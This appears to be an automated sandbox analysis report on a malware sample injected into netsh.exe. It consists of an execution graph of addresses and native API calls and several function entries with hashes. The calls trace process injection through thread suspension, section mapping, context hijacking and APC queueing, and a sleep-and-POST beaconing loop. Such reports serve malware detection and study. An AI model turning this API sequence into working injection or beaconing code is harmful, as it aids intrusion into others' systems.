                                                    execution_graph 108311 3d02ad0 LdrInitializeThunk 108314 30cf1ad 108317 30cb9d0 108314->108317 108318 30cb9f6 108317->108318 108325 30b9d40 108318->108325 108320 30cba02 108321 30cba26 108320->108321 108333 30b8f30 108320->108333 108371 30ca6b0 108321->108371 108374 30b9c90 108325->108374 108327 30b9d4d 108328 30b9d54 108327->108328 108386 30b9c30 108327->108386 108328->108320 108334 30b8f57 108333->108334 108805 30bb1c0 108334->108805 108336 30b8f69 108809 30baf10 108336->108809 108338 30b8f86 108345 30b8f8d 108338->108345 108880 30bae40 LdrLoadDll 108338->108880 108340 30b90f2 108340->108321 108342 30b8ffc 108825 30bf410 108342->108825 108344 30b9006 108344->108340 108346 30cbf90 2 API calls 108344->108346 108345->108340 108813 30bf380 108345->108813 108347 30b902a 108346->108347 108348 30cbf90 2 API calls 108347->108348 108349 30b903b 108348->108349 108350 30cbf90 2 API calls 108349->108350 108351 30b904c 108350->108351 108837 30bca90 108351->108837 108353 30b9059 108354 30c4a50 8 API calls 108353->108354 108355 30b9066 108354->108355 108356 30c4a50 8 API calls 108355->108356 108357 30b9077 108356->108357 108358 30b90a5 108357->108358 108359 30b9084 108357->108359 108361 30c4a50 8 API calls 108358->108361 108847 30bd620 108359->108847 108368 30b90c1 108361->108368 108364 30b90e9 108365 30b8d00 21 API calls 108364->108365 108365->108340 108366 30b9092 108863 30b8d00 108366->108863 108368->108364 108881 30bd6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 108368->108881 108372 30ca6cf 108371->108372 108373 30caf60 LdrLoadDll 108371->108373 108373->108372 108405 30c8bc0 108374->108405 108378 30b9cb6 108378->108327 108379 30b9cac 108379->108378 108412 30cb2b0 108379->108412 108381 30b9cf3 108381->108378 108383 30b9d13 108381->108383 108423 30b9ab0 108381->108423 108429 30b9620 LdrLoadDll 108383->108429 108385 30b9d25 108385->108327 108780 30cb5a0 108386->108780 108389 30cb5a0 LdrLoadDll 108390 30b9c5b 108389->108390 108391 30cb5a0 LdrLoadDll 108390->108391 108392 30b9c71 108391->108392 108393 30bf180 108392->108393 108394 30bf199 108393->108394 108788 30bb040 108394->108788 108396 30bf1ac 108792 30ca1e0 108396->108792 108399 30b9d65 108399->108320 108401 30bf1d2 108402 30bf1fd 108401->108402 108798 30ca260 108401->108798 108403 30ca490 2 API calls 108402->108403 108403->108399 108406 30c8bcf 108405->108406 108430 30c4e50 108406->108430 108408 30b9ca3 108409 30c8a70 108408->108409 108436 30ca600 108409->108436 108413 30cb2c9 108412->108413 108443 30c4a50 108413->108443 108415 30cb2e1 108416 30cb2ea 108415->108416 108482 30cb0f0 108415->108482 108416->108381 108418 30cb2fe 108418->108416 108500 30c9f00 108418->108500 108426 30b9aca 108423->108426 108758 30b7ea0 108423->108758 108425 30b9ad1 108425->108383 108426->108425 108771 30b8160 108426->108771 108429->108385 108431 30c4e5e 108430->108431 108432 30c4e6a 108430->108432 108431->108432 108435 30c52d0 LdrLoadDll 108431->108435 108432->108408 108434 30c4fbc 108434->108408 108435->108434 108439 30caf60 108436->108439 108438 30c8a85 108438->108379 108440 30caf92 108439->108440 108441 30caf70 108439->108441 108440->108438 108442 30c4e50 LdrLoadDll 108441->108442 108442->108440 108444 30c4d85 108443->108444 108454 30c4a64 108443->108454 108444->108415 108447 30c4b90 108511 30ca360 108447->108511 108448 30c4b73 108568 30ca460 LdrLoadDll 108448->108568 108451 30c4b7d 108451->108415 108452 30c4bb7 108453 30cbdc0 2 API calls 108452->108453 108457 30c4bc3 108453->108457 108454->108444 108508 30c9c50 108454->108508 108455 30c4d49 108458 30ca490 2 API calls 108455->108458 108456 30c4d5f 108577 30c4790 LdrLoadDll NtReadFile NtClose 108456->108577 108457->108451 108457->108455 108457->108456 108462 30c4c52 108457->108462 108459 30c4d50 108458->108459 108459->108415 108461 30c4d72 108461->108415 108463 30c4cb9 108462->108463 108465 30c4c61 108462->108465 108463->108455 108464 30c4ccc 108463->108464 108570 30ca2e0 108464->108570 108467 30c4c7a 108465->108467 108468 30c4c66 108465->108468 108471 30c4c7f 108467->108471 108472 30c4c97 108467->108472 108569 30c4650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 108468->108569 108514 30c46f0 108471->108514 108472->108459 108526 30c4410 108472->108526 108474 30c4c70 108474->108415 108476 30c4d2c 108574 30ca490 108476->108574 108477 30c4c8d 108477->108415 108480 30c4caf 108480->108415 108481 30c4d38 108481->108415 108483 30cb101 108482->108483 108484 30cb113 108483->108484 108595 30cbd40 108483->108595 108484->108418 108486 30cb134 108598 30c4070 108486->108598 108488 30cb180 108488->108418 108489 30cb157 108489->108488 108490 30c4070 3 API calls 108489->108490 108493 30cb179 108490->108493 108492 30cb20a 108494 30cb21a 108492->108494 108724 30caf00 LdrLoadDll 108492->108724 108493->108488 108630 30c5390 108493->108630 108640 30cad70 108494->108640 108497 30cb248 108719 30c9ec0 108497->108719 108501 30caf60 LdrLoadDll 108500->108501 108502 30c9f1c 108501->108502 108752 3d02c0a 108502->108752 108503 30c9f37 108505 30cbdc0 108503->108505 108755 30ca670 108505->108755 108507 30cb359 108507->108381 108509 30caf60 LdrLoadDll 108508->108509 108510 30c4b44 108509->108510 108510->108447 108510->108448 108510->108451 108512 30caf60 LdrLoadDll 108511->108512 108513 30ca37c NtCreateFile 108512->108513 108513->108452 108515 30c470c 108514->108515 108516 30ca2e0 LdrLoadDll 108515->108516 108517 30c472d 108516->108517 108518 30c4748 108517->108518 108519 30c4734 108517->108519 108521 30ca490 2 API calls 108518->108521 108520 30ca490 2 API calls 108519->108520 108522 30c473d 108520->108522 108523 30c4751 108521->108523 108522->108477 108578 30cbfd0 LdrLoadDll RtlAllocateHeap 108523->108578 108525 30c475c 108525->108477 108527 30c448e 108526->108527 108528 30c445b 108526->108528 108530 30c45d9 108527->108530 108533 30c44aa 108527->108533 108529 30ca2e0 LdrLoadDll 108528->108529 108532 30c4476 108529->108532 108531 30ca2e0 LdrLoadDll 108530->108531 108538 30c45f4 108531->108538 108534 30ca490 2 API calls 108532->108534 108535 30ca2e0 LdrLoadDll 108533->108535 108536 30c447f 108534->108536 108537 30c44c5 108535->108537 108536->108480 108540 30c44cc 108537->108540 108541 30c44e1 108537->108541 108591 30ca320 LdrLoadDll 108538->108591 108543 30ca490 2 API calls 108540->108543 108544 30c44fc 108541->108544 108545 30c44e6 108541->108545 108542 30c462e 108546 30ca490 2 API calls 108542->108546 108547 30c44d5 108543->108547 108553 30c4501 108544->108553 108579 30cbf90 108544->108579 108548 30ca490 2 API calls 108545->108548 108549 30c4639 108546->108549 108547->108480 108550 30c44ef 108548->108550 108549->108480 108550->108480 108562 30c4513 108553->108562 108582 30ca410 108553->108582 108554 30c4567 108555 30c457e 108554->108555 108590 30ca2a0 LdrLoadDll 108554->108590 108557 30c459a 108555->108557 108558 30c4585 108555->108558 108559 30ca490 2 API calls 108557->108559 108560 30ca490 2 API calls 108558->108560 108561 30c45a3 108559->108561 108560->108562 108563 30c45cf 108561->108563 108585 30cbb90 108561->108585 108562->108480 108563->108480 108565 30c45ba 108566 30cbdc0 2 API calls 108565->108566 108567 30c45c3 108566->108567 108567->108480 108568->108451 108569->108474 108571 30caf60 LdrLoadDll 108570->108571 108572 30c4d14 108571->108572 108573 30ca320 LdrLoadDll 108572->108573 108573->108476 108575 30caf60 LdrLoadDll 108574->108575 108576 30ca4ac NtClose 108575->108576 108576->108481 108577->108461 108578->108525 108592 30ca630 108579->108592 108581 30cbfa8 108581->108553 108583 30ca42c NtReadFile 108582->108583 108584 30caf60 LdrLoadDll 108582->108584 108583->108554 108584->108583 108586 30cbb9d 108585->108586 108587 30cbbb4 108585->108587 108586->108587 108588 30cbf90 2 API calls 108586->108588 108587->108565 108589 30cbbcb 108588->108589 108589->108565 108590->108555 108591->108542 108593 30caf60 LdrLoadDll 108592->108593 108594 30ca64c RtlAllocateHeap 108593->108594 108594->108581 108725 30ca540 108595->108725 108599 30c4081 108598->108599 108600 30c4089 108598->108600 108599->108489 108601 30c435c 108600->108601 108728 30ccf30 108600->108728 108601->108489 108603 30c40dd 108604 30ccf30 2 API calls 108603->108604 108608 30c40e8 108604->108608 108605 30c4136 108607 30ccf30 2 API calls 108605->108607 108611 30c414a 108607->108611 108608->108605 108733 30ccfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 108608->108733 108734 30cd060 108608->108734 108610 30c41a7 108612 30ccf30 2 API calls 108610->108612 108611->108610 108613 30cd060 3 API calls 108611->108613 108614 30c41bd 108612->108614 108613->108611 108615 30c41fa 108614->108615 108617 30cd060 3 API calls 108614->108617 108616 30ccf30 2 API calls 108615->108616 108618 30c4205 108616->108618 108617->108614 108619 30cd060 3 API calls 108618->108619 108626 30c423f 108618->108626 108619->108618 108621 30c4334 108741 30ccf90 LdrLoadDll RtlFreeHeap 108621->108741 108623 30c433e 108742 30ccf90 LdrLoadDll RtlFreeHeap 108623->108742 108625 30c4348 108743 30ccf90 LdrLoadDll RtlFreeHeap 108625->108743 108740 30ccf90 LdrLoadDll RtlFreeHeap 108626->108740 108628 30c4352 108744 30ccf90 LdrLoadDll RtlFreeHeap 108628->108744 108631 30c539b 108630->108631 108632 30c4a50 8 API calls 108631->108632 108634 30c53b7 108632->108634 108633 30c540a 108633->108492 108634->108633 108635 30c5405 108634->108635 108636 30c53f2 108634->108636 108638 30cbdc0 2 API calls 108635->108638 108637 30cbdc0 2 API calls 108636->108637 108639 30c53f7 108637->108639 108638->108633 108639->108492 108641 30cad84 108640->108641 108642 30cac30 LdrLoadDll 108640->108642 108745 30cac30 108641->108745 108642->108641 108645 30cac30 LdrLoadDll 108646 30cad96 108645->108646 108647 30cac30 LdrLoadDll 108646->108647 108648 30cad9f 108647->108648 108649 30cac30 LdrLoadDll 108648->108649 108650 30cada8 108649->108650 108651 30cac30 LdrLoadDll 108650->108651 108652 30cadb1 108651->108652 108653 30cac30 LdrLoadDll 108652->108653 108654 30cadbd 108653->108654 108655 30cac30 LdrLoadDll 108654->108655 108656 30cadc6 108655->108656 108657 30cac30 LdrLoadDll 108656->108657 108658 30cadcf 108657->108658 108659 30cac30 LdrLoadDll 108658->108659 108660 30cadd8 108659->108660 108661 30cac30 LdrLoadDll 108660->108661 108662 30cade1 108661->108662 108663 30cac30 LdrLoadDll 108662->108663 108664 30cadea 108663->108664 108665 30cac30 LdrLoadDll 108664->108665 108666 30cadf6 108665->108666 108667 30cac30 LdrLoadDll 108666->108667 108668 30cadff 108667->108668 108669 30cac30 LdrLoadDll 108668->108669 108670 30cae08 108669->108670 108671 30cac30 LdrLoadDll 108670->108671 108672 30cae11 108671->108672 108673 30cac30 LdrLoadDll 108672->108673 108674 30cae1a 108673->108674 108675 30cac30 LdrLoadDll 108674->108675 108676 30cae23 108675->108676 108677 30cac30 LdrLoadDll 108676->108677 108678 30cae2f 108677->108678 108679 30cac30 LdrLoadDll 108678->108679 108680 30cae38 108679->108680 108681 30cac30 LdrLoadDll 108680->108681 108682 30cae41 108681->108682 108683 30cac30 LdrLoadDll 108682->108683 108684 30cae4a 108683->108684 108685 30cac30 LdrLoadDll 108684->108685 108686 30cae53 108685->108686 108687 30cac30 LdrLoadDll 108686->108687 108688 30cae5c 108687->108688 108689 30cac30 LdrLoadDll 108688->108689 108690 30cae68 108689->108690 108691 30cac30 LdrLoadDll 108690->108691 108692 30cae71 108691->108692 108693 30cac30 LdrLoadDll 108692->108693 108694 30cae7a 108693->108694 108695 30cac30 LdrLoadDll 108694->108695 108696 30cae83 108695->108696 108697 30cac30 LdrLoadDll 108696->108697 108698 30cae8c 108697->108698 108699 30cac30 LdrLoadDll 108698->108699 108700 30cae95 108699->108700 108701 30cac30 LdrLoadDll 108700->108701 108702 30caea1 108701->108702 108703 30cac30 LdrLoadDll 108702->108703 108704 30caeaa 108703->108704 108705 30cac30 LdrLoadDll 108704->108705 108706 30caeb3 108705->108706 108707 30cac30 LdrLoadDll 108706->108707 108708 30caebc 108707->108708 108709 30cac30 LdrLoadDll 108708->108709 108710 30caec5 108709->108710 108711 30cac30 LdrLoadDll 108710->108711 108712 30caece 108711->108712 108713 30cac30 LdrLoadDll 108712->108713 108714 30caeda 108713->108714 108715 30cac30 LdrLoadDll 108714->108715 108716 30caee3 108715->108716 108717 30cac30 LdrLoadDll 108716->108717 108718 30caeec 108717->108718 108718->108497 108720 30caf60 LdrLoadDll 108719->108720 108721 30c9edc 108720->108721 108751 3d02df0 LdrInitializeThunk 108721->108751 108722 30c9ef3 108722->108418 108724->108494 108726 30caf60 LdrLoadDll 108725->108726 108727 30ca55c 108726->108727 108727->108486 108729 30ccf46 108728->108729 108730 30ccf40 108728->108730 108731 30cbf90 2 API calls 108729->108731 108730->108603 108732 30ccf6c 108731->108732 108732->108603 108733->108608 108735 30ccfd0 108734->108735 108736 30cd02d 108735->108736 108737 30cbf90 2 API calls 108735->108737 108736->108608 108738 30cd00a 108737->108738 108739 30cbdc0 2 API calls 108738->108739 108739->108736 108740->108621 108741->108623 108742->108625 108743->108628 108744->108601 108746 30cac4b 108745->108746 108747 30c4e50 LdrLoadDll 108746->108747 108748 30cac6b 108747->108748 108749 30c4e50 LdrLoadDll 108748->108749 108750 30cad17 108748->108750 108749->108750 108750->108645 108751->108722 108753 3d02c11 108752->108753 108754 3d02c1f LdrInitializeThunk 108752->108754 108753->108503 108754->108503 108756 30ca68c RtlFreeHeap 108755->108756 108757 30caf60 LdrLoadDll 108755->108757 108756->108507 108757->108756 108759 30b7eab 108758->108759 108760 30b7eb0 108758->108760 108759->108426 108761 30cbd40 LdrLoadDll 108760->108761 108762 30b7ed5 108761->108762 108763 30b7f38 108762->108763 108764 30c9ec0 2 API calls 108762->108764 108765 30b7f3e 108762->108765 108769 30cbd40 LdrLoadDll 108762->108769 108774 30ca5c0 108762->108774 108763->108426 108764->108762 108766 30b7f64 108765->108766 108768 30ca5c0 2 API calls 108765->108768 108766->108426 108770 30b7f55 108768->108770 108769->108762 108770->108426 108772 30b817e 108771->108772 108773 30ca5c0 2 API calls 108771->108773 108772->108383 108773->108772 108775 30ca5dc 108774->108775 108776 30caf60 LdrLoadDll 108774->108776 108779 3d02c70 LdrInitializeThunk 108775->108779 108776->108775 108777 30ca5f3 108777->108762 108779->108777 108781 30cb5c3 108780->108781 108784 30bacf0 108781->108784 108785 30bad14 108784->108785 108786 30bad50 LdrLoadDll 108785->108786 108787 30b9c4a 108785->108787 108786->108787 108787->108389 108790 30bb063 108788->108790 108789 30bb0e0 108789->108396 108790->108789 108803 30c9c90 LdrLoadDll 108790->108803 108793 30caf60 LdrLoadDll 108792->108793 108794 30bf1bb 108793->108794 108794->108399 108795 30ca7d0 108794->108795 108796 30ca7ef LookupPrivilegeValueW 108795->108796 108797 30caf60 LdrLoadDll 108795->108797 108796->108401 108797->108796 108799 30ca27c 108798->108799 108800 30caf60 LdrLoadDll 108798->108800 108804 3d02ea0 LdrInitializeThunk 108799->108804 108800->108799 108801 30ca29b 108801->108402 108803->108789 108804->108801 108806 30bb1f0 108805->108806 108807 30bb040 LdrLoadDll 108806->108807 108808 30bb204 108807->108808 108808->108336 108810 30baf34 108809->108810 108882 30c9c90 LdrLoadDll 108810->108882 108812 30baf6e 108812->108338 108814 30bf3ac 108813->108814 108815 30bb1c0 LdrLoadDll 108814->108815 108816 30bf3be 108815->108816 108883 30bf290 108816->108883 108819 30bf3d9 108822 30bf3e4 108819->108822 108823 30ca490 2 API calls 108819->108823 108820 30bf3f1 108821 30bf402 108820->108821 108824 30ca490 2 API calls 108820->108824 108821->108342 108822->108342 108823->108822 108824->108821 108826 30bf43c 108825->108826 108902 30bb2b0 108826->108902 108828 30bf44e 108829 30bf290 3 API calls 108828->108829 108830 30bf45f 108829->108830 108831 30bf469 108830->108831 108832 30bf481 108830->108832 108833 30bf474 108831->108833 108835 30ca490 2 API calls 108831->108835 108834 30bf492 108832->108834 108836 30ca490 2 API calls 108832->108836 108833->108344 108834->108344 108835->108833 108836->108834 108838 30bcaa6 108837->108838 108839 30bcab0 108837->108839 108838->108353 108840 30baf10 LdrLoadDll 108839->108840 108841 30bcb4e 108840->108841 108842 30bcb74 108841->108842 108843 30bb040 LdrLoadDll 108841->108843 108842->108353 108844 30bcb90 108843->108844 108845 30c4a50 8 API calls 108844->108845 108846 30bcbe5 108845->108846 108846->108353 108848 30bd646 108847->108848 108849 30bb040 LdrLoadDll 108848->108849 108850 30bd65a 108849->108850 108906 30bd310 108850->108906 108852 30b908b 108853 30bcc00 108852->108853 108854 30bcc26 108853->108854 108855 30bb040 LdrLoadDll 108854->108855 108856 30bcca9 108854->108856 108855->108856 108857 30bb040 LdrLoadDll 108856->108857 108858 30bcd16 108857->108858 108859 30baf10 LdrLoadDll 108858->108859 108860 30bcd7f 108859->108860 108861 30bb040 LdrLoadDll 108860->108861 108862 30bce2f 108861->108862 108862->108366 108935 30bf6d0 108863->108935 108865 30b8f25 108865->108321 108866 30b8d14 108866->108865 108940 30c43a0 108866->108940 108868 30b8d70 108868->108865 108943 30b8ab0 108868->108943 108871 30ccf30 2 API calls 108872 30b8db2 108871->108872 108873 30cd060 3 API calls 108872->108873 108877 30b8dc7 108873->108877 108874 30b7ea0 3 API calls 108874->108877 108877->108865 108877->108874 108878 30bc7b0 16 API calls 108877->108878 108879 30b8160 2 API calls 108877->108879 108949 30bf670 108877->108949 108953 30bf080 19 API calls 108877->108953 108878->108877 108879->108877 108880->108345 108881->108364 108882->108812 108884 30bf2aa 108883->108884 108892 30bf360 108883->108892 108885 30bb040 LdrLoadDll 108884->108885 108886 30bf2cc 108885->108886 108893 30c9f40 108886->108893 108888 30bf30e 108896 30c9f80 108888->108896 108891 30ca490 2 API calls 108891->108892 108892->108819 108892->108820 108894 30c9f5c 108893->108894 108895 30caf60 LdrLoadDll 108893->108895 108894->108888 108895->108894 108897 30caf60 LdrLoadDll 108896->108897 108898 30c9f9c 108897->108898 108901 3d035c0 LdrInitializeThunk 108898->108901 108899 30bf354 108899->108891 108901->108899 108903 30bb2d7 108902->108903 108904 30bb040 LdrLoadDll 108903->108904 108905 30bb313 108904->108905 108905->108828 108907 30bd327 108906->108907 108915 30bf710 108907->108915 108911 30bd3a2 108911->108852 108912 30bd39b 108912->108911 108926 30ca2a0 LdrLoadDll 108912->108926 108914 30bd3b5 108914->108852 108916 30bf735 108915->108916 108927 30b81a0 108916->108927 108918 30bf759 108919 30bd36f 108918->108919 108920 30c4a50 8 API calls 108918->108920 108922 30cbdc0 2 API calls 108918->108922 108934 30bf550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 108918->108934 108923 30ca6e0 108919->108923 108920->108918 108922->108918 108924 30caf60 LdrLoadDll 108923->108924 108925 30ca6ff CreateProcessInternalW 108924->108925 108925->108912 108926->108914 108928 30b829f 108927->108928 108929 30b81b5 108927->108929 108928->108918 108929->108928 108930 30c4a50 8 API calls 108929->108930 108931 30b8222 108930->108931 108932 30cbdc0 2 API calls 108931->108932 108933 30b8249 108931->108933 108932->108933 108933->108918 108934->108918 108936 30bf6ef 108935->108936 108937 30c4e50 LdrLoadDll 108935->108937 108938 30bf6fd 108936->108938 108939 30bf6f6 SetErrorMode 108936->108939 108937->108936 108938->108866 108939->108938 108954 30bf4a0 108940->108954 108942 30c43c6 108942->108868 108944 30b8aca 108943->108944 108945 30cbd40 LdrLoadDll 108944->108945 108946 30b8ad5 108945->108946 108947 30b8cea 108946->108947 108973 30c9880 108946->108973 108947->108871 108950 30bf683 108949->108950 109021 30c9e90 108950->109021 108953->108877 108955 30bf4bd 108954->108955 108961 30c9fc0 108955->108961 108958 30bf505 108958->108942 108962 30c9fdc 108961->108962 108963 30caf60 LdrLoadDll 108961->108963 108971 3d02f30 LdrInitializeThunk 108962->108971 108963->108962 108964 30bf4fe 108964->108958 108966 30ca010 108964->108966 108967 30caf60 LdrLoadDll 108966->108967 108968 30ca02c 108967->108968 108972 3d02d10 LdrInitializeThunk 108968->108972 108969 30bf52e 108969->108942 108971->108964 108972->108969 108974 30cbf90 2 API calls 108973->108974 108975 30c9897 108974->108975 108994 30b9310 108975->108994 108977 30c98b2 108978 30c98d9 108977->108978 108979 30c98f0 108977->108979 108980 30cbdc0 2 API calls 108978->108980 108982 30cbd40 LdrLoadDll 108979->108982 108981 30c98e6 108980->108981 108981->108947 108983 30c992a 108982->108983 108984 30cbd40 LdrLoadDll 108983->108984 108986 30c9943 108984->108986 108991 30c9be4 108986->108991 109000 30cbd80 LdrLoadDll 108986->109000 108987 30c9bc9 108988 30c9bd0 108987->108988 108987->108991 108989 30cbdc0 2 API calls 108988->108989 108990 30c9bda 108989->108990 108990->108947 108992 30cbdc0 2 API calls 108991->108992 108993 30c9c39 108992->108993 108993->108947 108995 30b9335 108994->108995 108996 30bacf0 LdrLoadDll 108995->108996 108997 30b9368 108996->108997 108999 30b938d 108997->108999 109001 30bcf20 108997->109001 108999->108977 109000->108987 109002 30bcf4c 109001->109002 109003 30ca1e0 LdrLoadDll 109002->109003 109004 30bcf65 109003->109004 109005 30bcf6c 109004->109005 109012 30ca220 109004->109012 109005->108999 109009 30bcfa7 109010 30ca490 2 API calls 109009->109010 109011 30bcfca 109010->109011 109011->108999 109013 30ca23c 109012->109013 109014 30caf60 LdrLoadDll 109012->109014 109020 3d02ca0 LdrInitializeThunk 109013->109020 109014->109013 109015 30bcf8f 109015->109005 109017 30ca810 109015->109017 109018 30ca82f 109017->109018 109019 30caf60 LdrLoadDll 109017->109019 109018->109009 109019->109018 109020->109015 109022 30c9eac 109021->109022 109023 30caf60 LdrLoadDll 109021->109023 109026 3d02dd0 LdrInitializeThunk 109022->109026 109023->109022 109024 30bf6ae 109024->108877 109026->109024 109027 3adcb84 109030 3ada042 109027->109030 109029 3adcba5 109031 3ada06b 109030->109031 109032 3ada182 NtQueryInformationProcess 109031->109032 109047 3ada56c 109031->109047 109034 3ada1ba 109032->109034 109033 3ada1ef 109033->109029 109034->109033 109035 3ada2db 109034->109035 109036 3ada290 109034->109036 109037 3ada2fc NtSuspendThread 109035->109037 109059 3ad9de2 NtCreateSection NtMapViewOfSection NtClose 109036->109059 109038 3ada30d 109037->109038 109041 3ada331 109037->109041 109038->109029 109040 3ada2cf 109040->109029 109043 3ada412 109041->109043 109050 3ad9bb2 109041->109050 109044 3ada531 109043->109044 109046 3ada4a6 NtSetContextThread 109043->109046 109045 3ada552 NtResumeThread 109044->109045 109045->109047 109049 3ada4bd 109046->109049 109047->109029 109048 3ada51c RtlQueueApcWow64Thread 109048->109044 109049->109044 109049->109048 109051 3ad9bf7 109050->109051 109052 3ad9c66 NtCreateSection 109051->109052 109053 3ad9d4e 109052->109053 109054 3ad9ca0 109052->109054 109053->109043 109055 3ad9cc1 NtMapViewOfSection 109054->109055 109055->109053 109056 3ad9d0c 109055->109056 109056->109053 109057 3ad9d88 109056->109057 109058 3ad9dc5 NtClose 109057->109058 109058->109043 109059->109040 109060 30c9080 109061 30cbd40 LdrLoadDll 109060->109061 109063 30c90bb 109061->109063 109062 30c919c 109063->109062 109064 30bacf0 LdrLoadDll 109063->109064 109065 30c90f1 109064->109065 109066 30c4e50 LdrLoadDll 109065->109066 109068 30c910d 109066->109068 109067 30c9120 Sleep 109067->109068 109068->109062 109068->109067 109071 30c8ca0 LdrLoadDll 109068->109071 109072 30c8eb0 LdrLoadDll 109068->109072 109071->109068 109072->109068

                                                    Executed Functions

                                                    Function 030CA360 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 556 30ca360-30ca3b1 call 30caf60 NtCreateFile
                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,030C4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,030C4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 030CA3AD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_30b0000_netsh.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: .z`
                                                    • API String ID: 823142352-1441809116
                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                    • Instruction ID: 5415386d4d32352c81088940966342e684f3bce7c0c8a54d36149a54da83d974
                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                    • Instruction Fuzzy Hash: 12F0BDB2211208ABCB08CF88DC84EEB77ADAF8C754F158248BA0D97240C630E8118BA4
                                                    Function 030C9076 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 97sleepCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 403 30c9076-30c9079 404 30c9059-30c9075 call 30cabd0 * 2 403->404 405 30c907b-30c90c2 call 30cbd40 403->405 413 30c919c-30c91a2 405->413 414 30c90c8-30c9118 call 30cbe10 call 30bacf0 call 30c4e50 405->414 424 30c9120-30c9131 Sleep 414->424 425 30c9196-30c919a 424->425 426 30c9133-30c9139 424->426 425->413 425->424 427 30c913b-30c9161 call 30c8ca0 426->427 428 30c9163-30c9183 426->428 430 30c9189-30c918c 427->430 428->430 431 30c9184 call 30c8eb0 428->431 430->425 431->430
                                                    APIs
                                                    • Sleep.KERNELBASE(000007D0), ref: 030C9128
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_30b0000_netsh.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID: POST$net.dll$wininet.dll
                                                    • API String ID: 3472027048-3140911592
                                                    • Opcode ID: 235e54007d989970cdd084e3f887681ffe68457ca1f981b71e99461c1efbff5f
                                                    • Instruction ID: aea58333a86bd991b8c18fb4525c6077a07f93c82b1cd0128d3fdf67d6bdddd8
                                                    • Opcode Fuzzy Hash: 235e54007d989970cdd084e3f887681ffe68457ca1f981b71e99461c1efbff5f
                                                    • Instruction Fuzzy Hash: EA31D276A02384ABC714EF68C885BAFB7B8EB84704F14805DEA1D6B245D730A610CBA4
                                                    Function 030B8310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 030B836A
                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 030B838B
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_30b0000_netsh.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    • Opcode ID: 9e70c73f60def60f65b4c435396576adf58625eb4223d803369717d0cef32593
                                                    • Instruction ID: c1148b0dd238de8849f755d0f2bad6463f9ebfb527986baf52d6436e905d32b8
                                                    • Opcode Fuzzy Hash: 9e70c73f60def60f65b4c435396576adf58625eb4223d803369717d0cef32593
                                                    • Instruction Fuzzy Hash: 0D01A231A923687BE721E6949C42FFE776C6B80E50F094158FF08BE1C1E6A4690647F6
                                                    Function 030C91A4 Relevance: 1.6, APIs: 1, Instructions: 119threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,030BF050,?,?,00000000), ref: 030C91EC
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_30b0000_netsh.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    • Opcode ID: 06be944055373b887599a832d9ffb7d2b2cc06b113b2fec72433bf1fd4ebb6a3
                                                    • Instruction ID: 76d0c51af204607b3b67a5bbfa3108190c990dc2eb7839eecb80c556585fe0e2
                                                    • Opcode Fuzzy Hash: 06be944055373b887599a832d9ffb7d2b2cc06b113b2fec72433bf1fd4ebb6a3
                                                    • Instruction Fuzzy Hash: 5041AC76611785ABD768DF74C881FEBB3A8BF84740F44051DF5299B280DB70B921CBA4
                                                    Function 030C91B0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,030BF050,?,?,00000000), ref: 030C91EC
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_30b0000_netsh.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    • Opcode ID: fae906c78181de7630efb0e23d798c80b6ead711412a0b26827c401ed9c2da1b
